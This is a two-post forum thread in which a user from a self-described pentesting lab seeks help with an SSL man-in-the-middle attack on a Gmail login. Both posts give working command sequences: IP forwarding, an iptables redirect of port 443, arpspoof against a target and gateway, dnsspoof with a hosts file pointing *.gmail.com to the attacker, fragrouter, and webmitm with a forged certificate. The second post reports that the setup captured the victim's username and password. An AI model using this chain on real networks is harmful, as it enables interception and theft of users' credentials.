Results 1 to 2 of 2

Thread: WEBMITM help

  1. #1

    Question WEBMITM help

    heyas, it's i again. Weak-net labs set up a lot of machines here fro pentesting and security playing, and we can't seem to get our port forwarding working :S
    i set up iptabes like so:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT

    iptables -A FORWARD -j ACCEPT

    from someone else's post, and the i tried:

    fragrouter -B1 (worked)
    arpspoof -t <ubuntu machine> <gateway's IP>
    dnsspoof
    - and then
    webmitm -d (and made a certificate)

    when we go back to the ubuntu machine i see the certificate i made when i try to go to gmail, then when i try to login it gmail with user/pass it just hangs....

    any suggestions? - thanx in advance - Weak-Net Labs.

  2. #2

    Default

    whoa.



    i hate to reply to myself so fast but we have found something interesting...
    i had to make a file (and define its full path) /root/dnspoof.hosts
    as:

    dnsspoof -i eth0 -f /root/dnsspoof.hosts

    then we ran:

    arpspoof -i eth0 -t <targetIP> <GatewayIP>

    and then:

    fragrouter -i eth0 -B1

    Then:

    webmitm -dd

    i guess the dd made it more verbose, i just accidentally pressed "d" 2x. heh
    well, it still would NOT forward the victim machine passed the login screen, but we let it sit for a bout 5 minutes trying, and just gave up and figured we'd wait for help from you guys, then i saw in the terminal that was running "webmitm -dd" my username and password!! @CK! :S
    still we are seriously confused.. - trev @ Weak-Net.

    post script: the aforementioned hosts file was like so:

    10.10.10.22 *.gmail.com

    (where that was the attackers IP)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •